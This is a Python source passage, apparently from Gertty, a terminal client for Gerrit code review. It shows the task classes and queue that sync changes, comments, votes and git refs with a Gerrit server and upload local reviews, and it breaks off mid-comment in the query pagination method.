class SyncChangesByCommitsTask(Task):
def __init__(self, commits, priority=NORMAL_PRIORITY):
super(SyncChangesByCommitsTask, self).__init__(priority)
self.commits = commits
def __repr__(self):
return '<SyncChangesByCommitsTask %s>' % (self.commits,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.commits == self.commits):
return True
return False
def run(self, sync):
query = ' OR '.join(['commit:%s' % x for x in self.commits])
changes = sync.get('changes/?q=%s' % query)
self.log.debug('Query: %s ' % (query,))
for c in changes:
sync.submitTask(SyncChangeTask(c['id'], priority=self.priority))
self.log.debug("Sync change %s for its commit" % (c['id'],))
def addCommit(self, commit):
if commit in self.commits:
return True
# 100 should be under the URL length limit
if len(self.commits) >= 100:
return False
self.commits.append(commit)
return True
class SyncChangeByNumberTask(Task):
def __init__(self, number, priority=NORMAL_PRIORITY):
super(SyncChangeByNumberTask, self).__init__(priority)
self.number = number
def __repr__(self):
return '<SyncChangeByNumberTask %s>' % (self.number,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.number == self.number):
return True
return False
def run(self, sync):
query = '%s' % self.number
changes = sync.get('changes/?q=%s' % query)
self.log.debug('Query: %s ' % (query,))
for c in changes:
task = SyncChangeTask(c['id'], priority=self.priority)
self.tasks.append(task)
sync.submitTask(task)
self.log.debug("Sync change %s because it is number %s" % (c['id'], self.number))
class SyncOutdatedChangesTask(Task):
def __init__(self, priority=NORMAL_PRIORITY):
super(SyncOutdatedChangesTask, self).__init__(priority)
def __eq__(self, other):
if other.__class__ == self.__class__:
return True
return False
def __repr__(self):
return '<SyncOutdatedChangesTask>'
def run(self, sync):
with sync.app.db.getSession() as session:
for change in session.getOutdated():
self.log.debug("Sync outdated change %s" % (change.id,))
sync.submitTask(SyncChangeTask(change.id, priority=self.priority))
class SyncChangeTask(Task):
def __init__(self, change_id, force_fetch=False, priority=NORMAL_PRIORITY):
super(SyncChangeTask, self).__init__(priority)
self.change_id = change_id
self.force_fetch = force_fetch
def __repr__(self):
return '<SyncChangeTask %s>' % (self.change_id,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.change_id == self.change_id and
other.force_fetch == self.force_fetch):
return True
return False
def run(self, sync):
start_time = time.time()
try:
self._syncChange(sync)
end_time = time.time()
total_time = end_time - start_time
self.log.info("Synced change %s in %0.5f seconds.", self.change_id, total_time)
except Exception:
try:
self.log.error("Marking change %s outdated" % (self.change_id,))
with sync.app.db.getSession() as session:
change = session.getChangeByID(self.change_id)
change.outdated = True
except Exception:
self.log.exception("Error while marking change %s as outdated" % (self.change_id,))
raise
def _syncChange(self, sync):
app = sync.app
remote_change = sync.get('changes/%s?o=DETAILED_LABELS&o=ALL_REVISIONS&o=ALL_COMMITS&o=MESSAGES&o=DETAILED_ACCOUNTS&o=CURRENT_ACTIONS&o=ALL_FILES' % self.change_id)
# Perform subqueries this task will need outside of the db session
for remote_commit, remote_revision in remote_change.get('revisions', {}).items():
remote_comments_data = sync.get('changes/%s/revisions/%s/comments' % (self.change_id, remote_commit))
remote_revision['_gertty_remote_comments_data'] = remote_comments_data
remote_conflicts = sync.query(['q=status:open+is:mergeable+conflicts:%s' %
remote_change['_number']])
fetches = collections.defaultdict(list)
parent_commits = set()
with app.db.getSession() as session:
change = session.getChangeByID(self.change_id)
account = session.getAccountByID(remote_change['owner']['_account_id'],
name=remote_change['owner'].get('name'),
username=remote_change['owner'].get('username'),
email=remote_change['owner'].get('email'))
if not change:
project = session.getProjectByName(remote_change['project'])
if not project:
self.log.debug("Project %s unknown while syncing change" % (
remote_change['project'],))
remote_project = sync.get('projects/%s' %
(urlparse.quote_plus(remote_change['project']),))
if remote_project:
project = session.createProject(
remote_project['name'],
description=remote_project.get('description', ''))
self.log.info("Created project %s", project.name)
self.results.append(ProjectAddedEvent(project))
sync.submitTask(SyncProjectBranchesTask(project.name, self.priority))
created = dateutil.parser.parse(remote_change['created'])
updated = dateutil.parser.parse(remote_change['updated'])
change = project.createChange(remote_change['id'], account, remote_change['_number'],
remote_change['branch'], remote_change['change_id'],
remote_change['subject'], created,
updated, remote_change['status'],
topic=remote_change.get('topic'))
self.log.info("Created new change %s in local DB.", change.id)
result = ChangeAddedEvent(change)
else:
result = ChangeUpdatedEvent(change)
app.project_cache.clear(change.project)
self.results.append(result)
change.owner = account
if change.status != remote_change['status']:
change.status = remote_change['status']
result.status_changed = True
if remote_change.get('starred'):
change.starred = True
else:
change.starred = False
change.subject = remote_change['subject']
change.updated = dateutil.parser.parse(remote_change['updated'])
change.topic = remote_change.get('topic')
unseen_conflicts = [x.id for x in change.conflicts]
for remote_conflict in remote_conflicts:
conflict_id = remote_conflict['id']
conflict = session.getChangeByID(conflict_id)
if not conflict:
self.log.info("Need to sync conflicting change %s for change %s.",
conflict_id, change.number)
sync.submitTask(SyncChangeTask(conflict_id, priority=self.priority))
else:
if conflict not in change.conflicts:
self.log.info("Added conflict %s for change %s in local DB.",
conflict.number, change.number)
change.addConflict(conflict)
self.results.append(ChangeUpdatedEvent(conflict))
if conflict_id in unseen_conflicts:
unseen_conflicts.remove(conflict_id)
for conflict_id in unseen_conflicts:
conflict = session.getChangeByID(conflict_id)
self.log.info("Deleted conflict %s for change %s in local DB.",
conflict.number, change.number)
change.delConflict(conflict)
self.results.append(ChangeUpdatedEvent(conflict))
repo = gitrepo.get_repo(change.project.name, app.config)
new_revision = False
for remote_commit, remote_revision in remote_change.get('revisions', {}).items():
revision = session.getRevisionByCommit(remote_commit)
# TODO: handle multiple parents
url = sync.app.config.git_url + change.project.name
if 'anonymous http' in remote_revision['fetch']:
ref = remote_revision['fetch']['anonymous http']['ref']
url = remote_revision['fetch']['anonymous http']['url']
auth = False
elif 'http' in remote_revision['fetch']:
auth = True
ref = remote_revision['fetch']['http']['ref']
url = list(urlparse.urlsplit(sync.app.config.url + change.project.name))
url[1] = '%s:%s@%s' % (
urlparse.quote_plus(sync.app.config.username),
urlparse.quote_plus(sync.app.config.password), url[1])
url = urlparse.urlunsplit(url)
elif 'ssh' in remote_revision['fetch']:
ref = remote_revision['fetch']['ssh']['ref']
url = remote_revision['fetch']['ssh']['url']
auth = False
elif 'git' in remote_revision['fetch']:
ref = remote_revision['fetch']['git']['ref']
url = remote_revision['fetch']['git']['url']
auth = False
else:
if len(remote_revision['fetch']):
errMessage = "No supported fetch method found. Server offers: %s" % (
', '.join(remote_revision['fetch'].keys()))
else:
errMessage = "The server is missing the download-commands plugin."
raise Exception(errMessage)
if (not revision) or self.force_fetch:
fetches[url].append('+%(ref)s:%(ref)s' % dict(ref=ref))
if not revision:
revision = change.createRevision(remote_revision['_number'],
remote_revision['commit']['message'], remote_commit,
remote_revision['commit']['parents'][0]['commit'],
auth, ref)
self.log.info("Created new revision %s for change %s revision %s in local DB.",
revision.key, self.change_id, remote_revision['_number'])
new_revision = True
revision.message = remote_revision['commit']['message']
actions = remote_revision.get('actions', {})
revision.can_submit = 'submit' in actions
# TODO: handle multiple parents
if revision.parent not in parent_commits:
parent_revision = session.getRevisionByCommit(revision.parent)
if not parent_revision and change.status not in CLOSED_STATUSES:
sync._syncChangeByCommit(revision.parent, self.priority)
self.log.debug("Change %s revision %s needs parent commit %s synced" %
(change.id, remote_revision['_number'], revision.parent))
parent_commits.add(revision.parent)
result.updateRelatedChanges(session, change)
f = revision.getFile('/COMMIT_MSG')
if f is None:
f = revision.createFile('/COMMIT_MSG', None,
None, None, None)
for remote_path, remote_file in remote_revision['files'].items():
f = revision.getFile(remote_path)
if f is None:
if remote_file.get('binary'):
inserted = deleted = None
else:
inserted = remote_file.get('lines_inserted', 0)
deleted = remote_file.get('lines_deleted', 0)
f = revision.createFile(remote_path, remote_file.get('status', 'M'),
remote_file.get('old_path'),
inserted, deleted)
remote_comments_data = remote_revision['_gertty_remote_comments_data']
for remote_file, remote_comments in remote_comments_data.items():
for remote_comment in remote_comments:
account = session.getAccountByID(remote_comment['author']['_account_id'],
name=remote_comment['author'].get('name'),
username=remote_comment['author'].get('username'),
email=remote_comment['author'].get('email'))
comment = session.getCommentByID(remote_comment['id'])
if not comment:
# Normalize updated -> created
created = dateutil.parser.parse(remote_comment['updated'])
parent = False
if remote_comment.get('side', '') == 'PARENT':
parent = True
fileobj = revision.getFile(remote_file)
if fileobj is None:
fileobj = revision.createFile(remote_file, 'M')
comment = fileobj.createComment(remote_comment['id'], account,
remote_comment.get('in_reply_to'),
created,
parent, remote_comment.get('line'),
remote_comment['message'])
self.log.info("Created new comment %s for revision %s in local DB.",
comment.key, revision.key)
else:
if comment.author != account:
comment.author = account
new_message = False
for remote_message in remote_change.get('messages', []):
if 'author' in remote_message:
account = session.getAccountByID(remote_message['author']['_account_id'],
name=remote_message['author'].get('name'),
username=remote_message['author'].get('username'),
email=remote_message['author'].get('email'))
if account.username != app.config.username:
new_message = True
else:
account = session.getSystemAccount()
message = session.getMessageByID(remote_message['id'])
if not message:
revision = session.getRevisionByNumber(change, remote_message.get('_revision_number', 1))
if revision:
# Normalize date -> created
created = dateutil.parser.parse(remote_message['date'])
message = revision.createMessage(remote_message['id'], account, created,
remote_message['message'])
self.log.info("Created new review message %s for revision %s in local DB.", message.key, revision.key)
else:
self.log.info("Unable to create new review message for revision %s because it is not in local DB (draft?).", remote_message.get('_revision_number'))
else:
if message.author != account:
message.author = account
remote_approval_entries = {}
remote_label_entries = {}
user_voted = False
for remote_label_name, remote_label_dict in remote_change.get('labels', {}).items():
for remote_approval in remote_label_dict.get('all', []):
if remote_approval.get('value') is None:
continue
remote_approval['category'] = remote_label_name
key = '%s~%s' % (remote_approval['category'], remote_approval['_account_id'])
remote_approval_entries[key] = remote_approval
if remote_approval['_account_id'] == sync.account_id and int(remote_approval['value']) != 0:
user_voted = True
for key, value in remote_label_dict.get('values', {}).items():
# +1: "LGTM"
label = dict(value=key,
description=value,
category=remote_label_name)
key = '%s~%s~%s' % (label['category'], label['value'], label['description'])
remote_label_entries[key] = label
remote_approval_keys = set(remote_approval_entries.keys())
remote_label_keys = set(remote_label_entries.keys())
local_approvals = {}
local_labels = {}
user_votes = {}
for approval in change.approvals:
if approval.draft and not new_revision:
# If we have a new revision, we need to delete
# draft local approvals because they can no longer
# be uploaded. Otherwise, keep them because we
# may be about to upload a review. Ignoring an
# approval here means it will not be deleted.
# Also keep track of these approvals so we can
# determine whether we should hold the change
# later.
user_votes[approval.category] = approval.value
# Count draft votes as having voted for the
# purposes of deciding whether to clear the
# reviewed flag later.
user_voted = True
continue
key = '%s~%s' % (approval.category, approval.reviewer.id)
if key in local_approvals:
# Delete duplicate approvals.
session.delete(approval)
else:
local_approvals[key] = approval
local_approval_keys = set(local_approvals.keys())
for label in change.labels:
key = '%s~%s~%s' % (label.category, label.value, label.description)
local_labels[key] = label
local_label_keys = set(local_labels.keys())
for key in local_approval_keys-remote_approval_keys:
session.delete(local_approvals[key])
for key in local_label_keys-remote_label_keys:
session.delete(local_labels[key])
for key in remote_approval_keys-local_approval_keys:
remote_approval = remote_approval_entries[key]
account = session.getAccountByID(remote_approval['_account_id'],
name=remote_approval.get('name'),
username=remote_approval.get('username'),
email=remote_approval.get('email'))
change.createApproval(account,
remote_approval['category'],
remote_approval['value'])
self.log.info("Created approval for change %s in local DB.", change.id)
user_value = user_votes.get(remote_approval['category'], 0)
if user_value > 0 and remote_approval['value'] < 0:
# Someone left a negative vote after the local
# user created a draft positive vote. Hold the
# change so that it doesn't look like the local
# user is ignoring negative feedback.
if not change.held:
change.held = True
result.held_changed = True
self.log.info("Setting change %s to held due to negative review after positive", change.id)
for key in remote_label_keys-local_label_keys:
remote_label = remote_label_entries[key]
change.createLabel(remote_label['category'],
remote_label['value'],
remote_label['description'])
for key in remote_approval_keys.intersection(local_approval_keys):
local_approval = local_approvals[key]
remote_approval = remote_approval_entries[key]
local_approval.value = remote_approval['value']
# For the side effect of updating account info:
account = session.getAccountByID(remote_approval['_account_id'],
name=remote_approval.get('name'),
username=remote_approval.get('username'),
email=remote_approval.get('email'))
remote_permitted_entries = {}
for remote_label_name, remote_label_values in remote_change.get('permitted_labels', {}).items():
for remote_label_value in remote_label_values:
remote_label = dict(category=remote_label_name,
value=remote_label_value)
key = '%s~%s' % (remote_label['category'], remote_label['value'])
remote_permitted_entries[key] = remote_label
remote_permitted_keys = set(remote_permitted_entries.keys())
local_permitted = {}
for permitted in change.permitted_labels:
key = '%s~%s' % (permitted.category, permitted.value)
local_permitted[key] = permitted
local_permitted_keys = set(local_permitted.keys())
for key in local_permitted_keys-remote_permitted_keys:
session.delete(local_permitted[key])
for key in remote_permitted_keys-local_permitted_keys:
remote_permitted = remote_permitted_entries[key]
change.createPermittedLabel(remote_permitted['category'],
remote_permitted['value'])
if not user_voted:
# Only consider changing the reviewed state if we don't have a vote
if new_revision or new_message:
if change.reviewed:
change.reviewed = False
result.review_flag_changed = True
app.project_cache.clear(change.project)
change.outdated = False
for url, refs in fetches.items():
self.log.debug("Fetching from %s with refs %s", url, refs)
try:
repo.fetch(url, refs)
except Exception:
# Backwards compat with GitPython before the multi-ref fetch
# patch.
# (https://github.com/gitpython-developers/GitPython/pull/170)
for ref in refs:
self.log.debug("git fetch %s %s" % (url, ref))
repo.fetch(url, ref)
class CheckReposTask(Task):
    # On startup, check all projects: for any subscribed project without
    # a local repo (or, if --fetch-missing-refs is supplied, for any local
    # change with missing refs), sync the associated changes.
def __repr__(self):
return '<CheckReposTask>'
def __eq__(self, other):
if (other.__class__ == self.__class__):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
projects = session.getProjects(subscribed=True)
for project in projects:
try:
missing = False
try:
repo = gitrepo.get_repo(project.name, app.config)
except gitrepo.GitCloneError:
missing = True
if missing or app.fetch_missing_refs:
sync.submitTask(CheckRevisionsTask(project.key,
priority=LOW_PRIORITY))
except Exception:
self.log.exception("Exception checking repo %s" %
(project.name,))
class CheckRevisionsTask(Task):
def __init__(self, project_key, priority=NORMAL_PRIORITY):
super(CheckRevisionsTask, self).__init__(priority)
self.project_key = project_key
def __repr__(self):
return '<CheckRevisionsTask %s>' % (self.project_key,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.project_key == self.project_key):
return True
return False
def run(self, sync):
app = sync.app
to_sync = set()
with app.db.getSession() as session:
project = session.getProject(self.project_key)
repo = None
try:
repo = gitrepo.get_repo(project.name, app.config)
except gitrepo.GitCloneError:
pass
for change in project.open_changes:
if repo:
for revision in change.revisions:
if not (repo.hasCommit(revision.parent) and
repo.hasCommit(revision.commit)):
to_sync.add(change.id)
else:
to_sync.add(change.id)
for change_id in to_sync:
sync.submitTask(SyncChangeTask(change_id, priority=self.priority))
class UploadReviewsTask(Task):
def __repr__(self):
return '<UploadReviewsTask>'
def __eq__(self, other):
if (other.__class__ == self.__class__):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
for c in session.getPendingTopics():
sync.submitTask(SetTopicTask(c.key, self.priority))
for c in session.getPendingRebases():
sync.submitTask(RebaseChangeTask(c.key, self.priority))
for c in session.getPendingStatusChanges():
sync.submitTask(ChangeStatusTask(c.key, self.priority))
for c in session.getPendingStarred():
sync.submitTask(ChangeStarredTask(c.key, self.priority))
for c in session.getPendingCherryPicks():
sync.submitTask(SendCherryPickTask(c.key, self.priority))
for r in session.getPendingCommitMessages():
sync.submitTask(ChangeCommitMessageTask(r.key, self.priority))
for m in session.getPendingMessages():
sync.submitTask(UploadReviewTask(m.key, self.priority))
class SetTopicTask(Task):
def __init__(self, change_key, priority=NORMAL_PRIORITY):
super(SetTopicTask, self).__init__(priority)
self.change_key = change_key
def __repr__(self):
return '<SetTopicTask %s>' % (self.change_key,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.change_key == self.change_key):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
change = session.getChange(self.change_key)
data = dict(topic=change.topic)
change.pending_topic = False
# Inside db session for rollback
sync.put('changes/%s/topic' % (change.id,),
data)
sync.submitTask(SyncChangeTask(change.id, priority=self.priority))
class RebaseChangeTask(Task):
def __init__(self, change_key, priority=NORMAL_PRIORITY):
super(RebaseChangeTask, self).__init__(priority)
self.change_key = change_key
def __repr__(self):
return '<RebaseChangeTask %s>' % (self.change_key,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.change_key == self.change_key):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
change = session.getChange(self.change_key)
change.pending_rebase = False
# Inside db session for rollback
sync.post('changes/%s/rebase' % (change.id,), {})
sync.submitTask(SyncChangeTask(change.id, priority=self.priority))
class ChangeStarredTask(Task):
def __init__(self, change_key, priority=NORMAL_PRIORITY):
super(ChangeStarredTask, self).__init__(priority)
self.change_key = change_key
def __repr__(self):
return '<ChangeStarredTask %s>' % (self.change_key,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.change_key == self.change_key):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
change = session.getChange(self.change_key)
if change.starred:
sync.put('accounts/self/starred.changes/%s' % (change.id,),
data={})
else:
sync.delete('accounts/self/starred.changes/%s' % (change.id,),
data={})
change.pending_starred = False
sync.submitTask(SyncChangeTask(change.id, priority=self.priority))
class ChangeStatusTask(Task):
def __init__(self, change_key, priority=NORMAL_PRIORITY):
super(ChangeStatusTask, self).__init__(priority)
self.change_key = change_key
def __repr__(self):
return '<ChangeStatusTask %s>' % (self.change_key,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.change_key == self.change_key):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
change = session.getChange(self.change_key)
if change.pending_status_message:
data = dict(message=change.pending_status_message)
else:
data = {}
change.pending_status = False
change.pending_status_message = None
# Inside db session for rollback
if change.status == 'ABANDONED':
sync.post('changes/%s/abandon' % (change.id,),
data)
elif change.status == 'NEW':
sync.post('changes/%s/restore' % (change.id,),
data)
elif change.status == 'SUBMITTED':
sync.post('changes/%s/submit' % (change.id,), {})
sync.submitTask(SyncChangeTask(change.id, priority=self.priority))
class SendCherryPickTask(Task):
def __init__(self, cp_key, priority=NORMAL_PRIORITY):
super(SendCherryPickTask, self).__init__(priority)
self.cp_key = cp_key
def __repr__(self):
return '<SendCherryPickTask %s>' % (self.cp_key,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.cp_key == self.cp_key):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
cp = session.getPendingCherryPick(self.cp_key)
data = dict(message=cp.message,
destination=cp.branch)
session.delete(cp)
# Inside db session for rollback
ret = sync.post('changes/%s/revisions/%s/cherrypick' %
(cp.revision.change.id, cp.revision.commit),
data)
if ret and 'id' in ret:
sync.submitTask(SyncChangeTask(ret['id'], priority=self.priority))
class ChangeCommitMessageTask(Task):
def __init__(self, revision_key, priority=NORMAL_PRIORITY):
super(ChangeCommitMessageTask, self).__init__(priority)
self.revision_key = revision_key
def __repr__(self):
return '<ChangeCommitMessageTask %s>' % (self.revision_key,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.revision_key == self.revision_key):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
revision = session.getRevision(self.revision_key)
revision.pending_message = False
data = dict(message=revision.message)
# Inside db session for rollback
if sync.version < (2,11,0):
sync.post('changes/%s/revisions/%s/message' %
(revision.change.id, revision.commit),
data)
else:
edit = sync.get('changes/%s/edit' % revision.change.id)
if edit is not None:
raise Exception("Edit already in progress on change %s" %
(revision.change.number,))
sync.put('changes/%s/edit:message' % (revision.change.id,), data)
sync.post('changes/%s/edit:publish' % (revision.change.id,), {})
change_id = revision.change.id
sync.submitTask(SyncChangeTask(change_id, priority=self.priority))
class UploadReviewTask(Task):
def __init__(self, message_key, priority=NORMAL_PRIORITY):
super(UploadReviewTask, self).__init__(priority)
self.message_key = message_key
def __repr__(self):
return '<UploadReviewTask %s>' % (self.message_key,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.message_key == self.message_key):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
message = session.getMessage(self.message_key)
if message is None:
self.log.debug("Message %s has already been uploaded" % (
self.message_key))
return
change = message.revision.change
if not change.held:
self.log.debug("Syncing %s to find out if it should be held" % (change.id,))
t = SyncChangeTask(change.id)
t.run(sync)
self.results += t.results
submit = False
change_id = None
with app.db.getSession() as session:
message = session.getMessage(self.message_key)
revision = message.revision
change = message.revision.change
if change.held:
self.log.debug("Not uploading review to %s because it is held" %
(change.id,))
return
change_id = change.id
current_revision = change.revisions[-1]
if change.pending_status and change.status == 'SUBMITTED':
submit = True
data = dict(message=message.message,
strict_labels=False)
if revision == current_revision:
data['labels'] = {}
for approval in change.draft_approvals:
data['labels'][approval.category] = approval.value
session.delete(approval)
comments = {}
for file in revision.files:
if file.draft_comments:
comment_list = []
for comment in file.draft_comments:
d = dict(line=comment.line,
message=comment.message)
if comment.parent:
d['side'] = 'PARENT'
comment_list.append(d)
session.delete(comment)
comments[file.path] = comment_list
if comments:
data['comments'] = comments
session.delete(message)
# Inside db session for rollback
sync.post('changes/%s/revisions/%s/review' % (change.id, revision.commit),
data)
if submit:
# In another db session in case submit fails after posting
# the message succeeds
with app.db.getSession() as session:
change = session.getChangeByID(change_id)
change.pending_status = False
change.pending_status_message = None
sync.post('changes/%s/submit' % (change_id,), {})
sync.submitTask(SyncChangeTask(change_id, priority=self.priority))
class PruneDatabaseTask(Task):
def __init__(self, age, priority=NORMAL_PRIORITY):
super(PruneDatabaseTask, self).__init__(priority)
self.age = age
def __repr__(self):
return '<PruneDatabaseTask %s>' % (self.age,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.age == self.age):
return True
return False
def run(self, sync):
if not self.age:
return
app = sync.app
with app.db.getSession() as session:
for change in session.getChanges('status:closed age:%s' % self.age):
t = PruneChangeTask(change.key, priority=self.priority)
self.tasks.append(t)
sync.submitTask(t)
t = VacuumDatabaseTask(priority=self.priority)
self.tasks.append(t)
sync.submitTask(t)
class PruneChangeTask(Task):
def __init__(self, key, priority=NORMAL_PRIORITY):
super(PruneChangeTask, self).__init__(priority)
self.key = key
def __repr__(self):
return '<PruneChangeTask %s>' % (self.key,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.key == self.key):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
change = session.getChange(self.key)
if not change:
return
repo = gitrepo.get_repo(change.project.name, app.config)
self.log.info("Pruning %s change %s status:%s updated:%s" % (
change.project.name, change.number, change.status, change.updated))
change_ref = None
for revision in change.revisions:
if change_ref is None:
change_ref = '/'.join(revision.fetch_ref.split('/')[:-1])
self.log.info("Deleting %s ref %s" % (
change.project.name, revision.fetch_ref))
repo.deleteRef(revision.fetch_ref)
self.log.info("Deleting %s ref %s" % (
change.project.name, change_ref))
try:
repo.deleteRef(change_ref)
except OSError as e:
if e.errno not in [errno.EISDIR, errno.EPERM]:
raise
session.delete(change)
class VacuumDatabaseTask(Task):
def __init__(self, priority=NORMAL_PRIORITY):
super(VacuumDatabaseTask, self).__init__(priority)
def __repr__(self):
return '<VacuumDatabaseTask>'
def __eq__(self, other):
if other.__class__ == self.__class__:
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
session.vacuum()
class Sync(object):
def __init__(self, app, disable_background_sync):
self.user_agent = 'Gertty/%s %s' % (gertty.version.version_info.release_string(),
requests.utils.default_user_agent())
self.version = (0, 0, 0)
self.offline = False
self.account_id = None
self.app = app
self.log = logging.getLogger('gertty.sync')
self.queue = MultiQueue([HIGH_PRIORITY, NORMAL_PRIORITY, LOW_PRIORITY])
self.result_queue = queue.Queue()
self.session = requests.Session()
if self.app.config.auth_type == 'basic':
authclass = requests.auth.HTTPBasicAuth
elif self.app.config.auth_type == 'form':
authclass = FormAuth
else:
authclass = requests.auth.HTTPDigestAuth
self.auth = authclass(
self.app.config.username, self.app.config.password)
self.submitTask(GetVersionTask(HIGH_PRIORITY))
self.submitTask(SyncOwnAccountTask(HIGH_PRIORITY))
if not disable_background_sync:
self.submitTask(CheckReposTask(HIGH_PRIORITY))
self.submitTask(UploadReviewsTask(HIGH_PRIORITY))
self.submitTask(SyncProjectListTask(HIGH_PRIORITY))
self.submitTask(SyncSubscribedProjectsTask(NORMAL_PRIORITY))
self.submitTask(SyncSubscribedProjectBranchesTask(LOW_PRIORITY))
self.submitTask(SyncOutdatedChangesTask(LOW_PRIORITY))
self.submitTask(PruneDatabaseTask(self.app.config.expire_age, LOW_PRIORITY))
self.periodic_thread = threading.Thread(target=self.periodicSync)
self.periodic_thread.daemon = True
self.periodic_thread.start()
def periodicSync(self):
hourly = time.time()
while True:
try:
time.sleep(60)
self.syncSubscribedProjects()
now = time.time()
if now-hourly > 3600:
hourly = now
self.pruneDatabase()
self.syncOutdatedChanges()
except Exception:
self.log.exception('Exception in periodicSync')
def submitTask(self, task):
if not self.offline:
if not self.queue.put(task, task.priority):
task.complete(False)
else:
task.complete(False)
def run(self, pipe):
task = None
while True:
task = self._run(pipe, task)
def _run(self, pipe, task=None):
if not task:
task = self.queue.get()
self.log.debug('Run: %s' % (task,))
try:
task.run(self)
task.complete(True)
self.queue.complete(task)
except (requests.ConnectionError, OfflineError) as e:
self.log.warning("Offline due to: %s" % (e,))
if not self.offline:
self.submitTask(GetVersionTask(HIGH_PRIORITY))
self.submitTask(UploadReviewsTask(HIGH_PRIORITY))
self.offline = True
self.app.status.update(offline=True, refresh=False)
os.write(pipe, six.b('refresh\n'))
time.sleep(30)
return task
except Exception:
task.complete(False)
self.queue.complete(task)
self.log.exception('Exception running task %s' % (task,))
self.app.status.update(error=True, refresh=False)
self.offline = False
self.app.status.update(offline=False, refresh=False)
for r in task.results:
self.result_queue.put(r)
os.write(pipe, six.b('refresh\n'))
return None
def url(self, path):
return self.app.config.url + 'a/' + path
def checkResponse(self, response):
self.log.debug('HTTP status code: %d', response.status_code)
if response.status_code == 503:
raise OfflineError("Received 503 status code")
def get(self, path):
url = self.url(path)
self.log.debug('GET: %s' % (url,))
r = self.session.get(url,
verify=self.app.config.verify_ssl,
auth=self.auth, timeout=TIMEOUT,
headers = {'Accept': 'application/json',
'Accept-Encoding': 'gzip',
'User-Agent': self.user_agent})
self.checkResponse(r)
        if r.status_code == 200:
            # Strip Gerrit's ")]}'" XSSI-protection prefix before parsing the JSON body.
            ret = json.loads(r.text[4:])
if len(ret):
self.log.debug('200 OK, Received: %s' % (ret,))
else:
self.log.debug('200 OK, No body.')
return ret
def post(self, path, data):
url = self.url(path)
self.log.debug('POST: %s' % (url,))
self.log.debug('data: %s' % (data,))
r = self.session.post(url, data=json.dumps(data).encode('utf8'),
verify=self.app.config.verify_ssl,
auth=self.auth, timeout=TIMEOUT,
headers = {'Content-Type': 'application/json;charset=UTF-8',
'User-Agent': self.user_agent})
self.checkResponse(r)
self.log.debug('Received: %s' % (r.text,))
ret = None
if r.text and len(r.text)>4:
try:
ret = json.loads(r.text[4:])
except Exception:
self.log.exception("Unable to parse result %s from post to %s" %
(r.text, url))
return ret
def put(self, path, data):
url = self.url(path)
self.log.debug('PUT: %s' % (url,))
self.log.debug('data: %s' % (data,))
r = self.session.put(url, data=json.dumps(data).encode('utf8'),
verify=self.app.config.verify_ssl,
auth=self.auth, timeout=TIMEOUT,
headers = {'Content-Type': 'application/json;charset=UTF-8',
'User-Agent': self.user_agent})
self.checkResponse(r)
self.log.debug('Received: %s' % (r.text,))
def delete(self, path, data):
url = self.url(path)
self.log.debug('DELETE: %s' % (url,))
self.log.debug('data: %s' % (data,))
r = self.session.delete(url, data=json.dumps(data).encode('utf8'),
verify=self.app.config.verify_ssl,
auth=self.auth, timeout=TIMEOUT,
headers = {'Content-Type': 'application/json;charset=UTF-8',
'User-Agent': self.user_agent})
self.checkResponse(r)
self.log.debug('Received: %s' % (r.text,))
def syncSubscribedProjects(self):
task = SyncSubscribedProjectsTask(LOW_PRIORITY)
self.submitTask(task)
if task.wait():
for subtask in task.tasks:
subtask.wait()
def pruneDatabase(self):
task = PruneDatabaseTask(self.app.config.expire_age, LOW_PRIORITY)
self.submitTask(task)
if task.wait():
for subtask in task.tasks:
subtask.wait()
def syncOutdatedChanges(self):
task = SyncOutdatedChangesTask(LOW_PRIORITY)
self.submitTask(task)
if task.wait():
for subtask in task.tasks:
subtask.wait()
def _syncChangeByCommit(self, commit, priority):
# Accumulate sync change by commit tasks because they often
# come in batches. This method assumes it is being called
# from within the run queue already and therefore does not
# need to worry about locking the queue.
task = None
for task in self.queue.find(SyncChangesByCommitsTask, priority):
if task.addCommit(commit):
return
task = SyncChangesByCommitsTask([commit], priority)
self.submitTask(task)
def setRemoteVersion(self, version):
base = version.split('-')[0]
parts = base.split('.')
major = minor = micro = 0
if len(parts) > 0:
major = int(parts[0])
if len(parts) > 1:
minor = int(parts[1])
if len(parts) > 2:
micro = int(parts[2])
self.version = (major, minor, micro)
self.log.info("Remote version is: %s (parsed as %s)" % (version, self.version))
def query(self, queries):
changes = []
sortkey = ''
done = False
offset = 0
while not done:
query = '&'.join(queries)
# We don't actually want to limit to 500, but that's the server-side default, and
# if we don't specify this, we won't get a _more_changes flag.
q = 'changes/?n=500%s&%s' % (sortkey, query)
self.log.debug('Query: %s' % (q,))
responses = self.get(q)
if len(queries) == 1:
responses = [responses]
done = True
for batch in responses:
changes += batch
if batch and '_more_changes' in batch[-1]:
done = False
if '_sortkey' in batch[-1]:
sortkey = '&N=%s' % (batch[-1]['_sortkey'],)
else:
offset += len(batch)
sortkey = '&start=%s' % (offset,)
return changes
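    # Pagination sketch for the loop above (illustrative; assumes a single
    # subscribed project named "foo"): the first request looks like
    #     changes/?n=500&q=project:foo status:open
    # and, while the last change in a batch carries "_more_changes", the next
    # request inserts either the old-style "&N=<_sortkey>" resume key or the
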